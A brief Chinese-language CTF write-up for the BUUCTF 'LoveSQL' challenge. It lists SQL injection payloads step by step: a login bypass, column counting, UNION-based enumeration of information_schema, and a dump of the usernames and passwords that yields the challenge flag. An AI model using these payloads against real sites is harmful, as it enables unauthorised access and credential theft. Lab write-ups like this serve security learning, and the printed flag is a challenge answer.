buuctfWeb-[极客大挑战 2019]LoveSQL

万能密码 admin' or 1=1#

（此处完整查询语句为SELECT * FROM users WHERE id = 'admin' or 1=1#）

查询一下表内有几个字段（几列） 1' order by 4 #

4 报错那查询一下3：1' order by 3 #

那就说明有 3 个字段查询一下：1' union select 1,2,3#

证明第三个字段是password，我们在用户名输入，进行联合爆表

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'#

继续 1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#

发现flag{597c5edb-89c8-4549-8508-02fd0d72e679}